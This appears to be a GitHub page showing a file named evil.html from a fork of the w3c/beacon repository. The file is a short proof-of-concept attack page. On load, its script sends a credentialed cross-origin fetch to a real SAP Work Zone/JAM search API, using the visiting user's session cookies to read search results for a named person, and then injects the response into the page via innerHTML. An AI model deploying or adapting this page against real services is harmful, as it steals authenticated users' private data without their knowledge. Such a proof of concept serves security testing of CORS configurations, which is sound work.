forked from w3c/beacon
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathevil.html
29 lines (26 loc) · 1.24 KB
/
evil.html
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
<!DOCTYPE html>
<html>
<body>
<p id="demo">Fetch a resource to change this text.</p>
<script>
getText("https://swzdevintegration.workzonelts.cfapps.sap.hana.ondemand.com/dynamic_dest/JAM/api/v1/OData/SearchSummary?Query=%27martin%27&$expand=Results/ObjectReference&$select=Results/ObjectReference/Type,Results/ObjectReference/Title,Results/ObjectReference/WebURL&_=1629367477811");
async function getText(file) {
let myObject = await fetch(file,{
method: 'GET', // *GET, POST, PUT, DELETE, etc.
mode: 'cors', // no-cors, *cors, same-origin
cache: 'no-cache', // *default, no-cache, reload, force-cache, only-if-cached
credentials: 'include', // include, *same-origin, omit
headers: {
//'Content-Type': 'application/json'
// 'Content-Type': 'application/x-www-form-urlencoded',
},
redirect: 'follow', // manual, *follow, error
referrerPolicy: 'no-referrer' // no-referrer, *no-referrer-when-downgrade, origin, origin-when-cross-origin, same-origin, strict-origin, strict-origin-when-cross-origin, unsafe-url
//body: JSON.stringify(data) // body data type must match "Content-Type" header
});
let myText = await myObject.text();
document.getElementById("demo").innerHTML = myText;
}
</script>
</body>
</html>